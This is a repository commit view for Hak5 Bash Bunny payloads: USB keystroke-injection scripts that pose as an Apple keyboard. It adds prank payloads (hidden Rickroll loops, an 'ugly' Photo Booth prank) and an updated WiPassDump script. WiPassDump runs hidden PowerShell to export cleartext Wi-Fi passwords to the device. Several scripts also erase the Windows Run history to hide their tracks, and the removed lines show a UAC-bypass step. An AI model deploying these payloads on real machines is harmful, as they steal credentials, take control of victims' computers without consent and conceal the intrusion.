HAK5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-12-24 05:58:28 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update WiPassDump and add UnifiedRickRoll, Ascii-Prank, and Photobooth prank payload (#139)

Browse Source 
* optimized WiPassDump payload to run in one file and a bit quicker.

* Create Prank folder and add UnifiedRickRoll payload

* Added UnifiedRickRoll support for windows

* Updated documentation on UnifiedRickRollWindows

* Causes payload to use roughly 30 times less processing power.

* Added Ascii-Prank Rick roll and Photo-Booth prank
This commit is contained in:
jafahulo
2017-04-07 00:09:47 -05:00
committed by Sebastian Kinne
parent 945b5c14d9
commit eb68665c67
11 changed files with 338 additions and 88 deletions
Download Patch File Download Diff File Expand all files Collapse all files

22
payloads/library/Pranks/Ascii-Prank/art Executable file
View File

@@ -0,0 +1,22 @@
__ /^\
.' \ / :.\
/ \ | :: \
/ /. \ / ::: |
| |::. \ / :::'/
| / \::. | / :::'/
`--` \' `~~~ ':'/`
/ (
/ 0 _ 0 \
\/ \_/ \/
-== '.' | '.' ==-
/\ '-^-' /\
\ _ _ /
.-`-((\o/))-`-.
_ / //^\\ \ _
."o".( , .:::. , )."o".
|o o\\ \:::::/ //o o|
\ \\ |:::::| // /
\ \\__/:::::\__// /
\ .:.\ `':::'` /.:. /
\':: |_ _| ::'/
`---` `"""""` `---`

17
payloads/library/Pranks/Ascii-Prank/payload.txt Executable file
View File

@@ -0,0 +1,17 @@
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
LED R 300
Q GUI SPACE
Q DELAY 200
Q STRING terminal
Q DELAY 400
Q ENTER
Q DELAY 400
Q GUI N
Q DELAY 100
Q STRING cat /Volumes/BashBunny/payloads/switch2/art
Q DELAY 100
Q ENTER
LED G

25
payloads/library/Pranks/Photo-Booth-Ugly-Prank/README.md Normal file
View File

@@ -0,0 +1,25 @@
# Photo booth ugly prank for Bash Bunny
* Author: Jafahulo
* Version: Version 1.0
* Target: OSX
## Description
Quick payload that takes a photo of target, and tells them that they're ugly
REQUIRES THE BASH BUNNY TO BE PLUGGED IN THE FULL TIME
## Configuration
None needed
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Red (blinking) | Running |
| Green | Attack Complete |
## Discussion
none

77
payloads/library/Pranks/Photo-Booth-Ugly-Prank/payload.txt Executable file
View File

@@ -0,0 +1,77 @@
ATTACKMODE HID VID_0X05AC PID_0X021E
LED R 200
Q DELAY 1000
Q GUI SPACE
Q DELAY 100
Q STRING photo booth
Q DELAY 300
Q ENTER
Q DELAY 3500
Q ENTER
Q DELAY 500
Q GUI 1
Q DELAY 5000
Q GUI SPACE
Q DELAY 100
Q STRING textEdit
Q DELAY 100
Q ENTER
Q DELAY 1000
Q GUI N
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI B
Q STRING saaaayyyy You look ugly!
Q DELAY 100
Q ENTER
LED G

22
payloads/library/Pranks/UnifiedRickRoll/README.md Normal file
View File

@@ -0,0 +1,22 @@
# UnifiedRickRoll for Bash Bunny
* Author: Jafahulo
* Version: Version 1.0
* Target: OSX
## Description
Runs a script in background that will crank up volume and rick roll target at specified time.
## Configuration
set time to run in payload.txt
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Red (blinking) | Running |
| Green | Attack Complete |
## Discussion
https://forums.hak5.org/index.php?/topic/40618-payload-unifiedrickroll/

24
payloads/library/Pranks/UnifiedRickRoll/payload.txt Executable file
View File

@@ -0,0 +1,24 @@
ATTACKMODE HID VID_0X05AC PID_0X021E
time=1734
LED R 200
Q GUI SPACE
Q DELAY 200
Q STRING terminal
Q DELAY 100
Q ENTER
Q DELAY 1000
Q GUI n
Q DELAY 1000
Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while test \$hi == \'0\'\; do if [ \$ho == $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown
# close up shop
Q DELAY 1000
Q ENTER
Q GUI W
Q ENTER
LED G

38
payloads/library/Pranks/UnifiedRickRollWindows/README.md Normal file
View File

@@ -0,0 +1,38 @@
# UnifiedRickRoll for Bash Bunny
* Author: Jafahulo
* Version: Version 1.0
* Target: Windows
## Description
Runs a script in background that will crank up volume and rick roll target at specified time. Also removes 'run' diologue history to "hide" tracks
The format for the time is as follows: How many hours have passed since midnight + how many minutes have passed since that hour started.
As an example: 1:39am would be 139, 1:39pm would be 1339 (it's in 24 hour format, not 12), 5:03pm would be 173, and 5:02am would be 52.
This is kinda confusing at first, but if you tinker with it for a couple minutes, it's pretty easy to figure out.
Additionally, you can run this in any powershell window, and it will set the current time in that format to $time:
$time=(Get-Date).Hour.toString()+(Get-Date).Minute.toString()
## Configuration
set time to run in payload.txt
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Red (blinking) | Running |
| Blue (blinking) | Cleaning up
| Green | Attack Complete |
## Discussion
https://forums.hak5.org/index.php?/topic/40621-payload-unifiedrickrollwindows/

34
payloads/library/Pranks/UnifiedRickRollWindows/payload.txt Executable file
View File

@@ -0,0 +1,34 @@
ATTACKMODE HID VID_0X05AC PID_0X021E
#Use format described in the readme
time=1051
#run payload
LED R 200
Q GUI r
Q DELAY 200
Q STRING cmd -A '/t:fe /k mode con: lines=1 cols=15'
Q DELAY 200
Q ENTER
Q DELAY 500
Q STRING powershell -NoP -NonI -W Hidden -Exec Bypass \$hi=0\; \$ho=\(Get-Date\).Hour.toString\(\)\; while \(\$hi -eq \'0\'\) \{ if \(\$ho -eq $time \) \{\$vol=new-object -com wscript.shell\; For\(\$i=0\; \$i -le 50\; \$i\+\+\)\{\$vol.SendKeys\(\[char\]175\)\}\; start \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; \$hi=1\; \} \$ho=\(Get-Date\).Hour.toString\(\)\+\(Get-Date\).Minute.toString\(\)\;\}
Q DELAY 500
Q ENTER
#Hide tracks
LED B 500
QUACK GUI r
QUACK DELAY 1000
QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
QUACK ENTER
LED G

6
payloads/library/WiPassDump/a.cmd
View File

@@ -1,6 +0,0 @@
REM Go to dump directory
cd /d %~dp0
cd ../../loot/WiPassDump/
REM Dump saved Wi-Fi infos
netsh wlan export profile key=clear

79
payloads/library/WiPassDump/payload.txt Normal file → Executable file
View File

@@ -1,56 +1,55 @@
#!/bin/bash
#
# Title: WiPassDump # Title: WiPassDump
# Author: samdeg555 # Author: jafahulo -- Cred: samdeg555, hak5darren
# Version: 1.0 # Version: 2.0
# Target: Windows # Target: Windows
# #
# Runs powershell as Administrator # Runs powershell script to dump clear text passwords to \loot\WiPassDump
# Bypasses UAC # Runs powershell script to remove "run" prompt history - creds for this go to hak5darren.
# Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny
# #
# Red Blinking..........Running
LED R 200 # Blue Blinking.........Removing tracks
# Green.................Finished
# Create directory to dump infos ################################################
mkdir -p /root/udisk/loot/WiPassDump
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
# Set language accordingly
Q SET_LANGUAGE ca
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
LED B 200 # Create directory under loot to store passwords in
mkdir -p /root/udisk/loot/WiPassDump
LED R 200
# Open windows run console
# Launch powershell as admin
Q GUI r Q GUI r
Q DELAY 100 Q DELAY 1000
Q STRING powershell Start-Process powershell -Verb runAs
# enter payload and execute
Q STRING powershell -WindowStyle Hidden \$bunny\=\(gwmi win32_volume -f \'label=\\\"BashBunny\\\"\'\).NAME\; cd \$bunny\\loot\\WiPassDump\; netsh wlan export profile key=clear
Q ENTER Q ENTER
# Bypass UAC #Let code run, then sync
Q DELAY 3000
Q ALT o
Q ENTER
Q DELAY 500
# Start a.cmd Q DELAY 5000
Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/'
Q STRING $SWITCH_POSITION
Q STRING '/a.cmd'"'"')'
Q ENTER
# Wait for a.cmd to finish and exit
LED R B 500
Q DELAY 3000
Q STRING exit
Q ENTER
sync sync
# Wait for misc. to happen on computer
Q DELAY 1000
# Hide tracks
LED B 500
QUACK GUI r
QUACK DELAY 1000
QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
QUACK ENTER
QUACK DELAY 1000
# Done!
LED G LED G

8
payloads/library/WiPassDump/readme.md
View File

@@ -1,7 +1,7 @@
# WiPassDump for Bash Bunnys # WiPassDump for Bash Bunnys
* Author: samdeg555 * Author: Jafahulo --creds: samdeg555, hak5darren
* Version: Version 1.0 * Version: Version 2.0
* Target: Windows * Target: Windows
## Description ## Description
@@ -17,9 +17,7 @@ None needed.
| LED | Status | | LED | Status |
| ------------------ | -------------------------------------------- | | ------------------ | -------------------------------------------- |
| Red (blinking) | Setting up | | Red (blinking) | Running |
| Blue (blinking) | Attack running |
| Purple (blinking) | Almost done (cleaning up) |
| Green | Attack Complete | | Green | Attack Complete |
## Discussion ## Discussion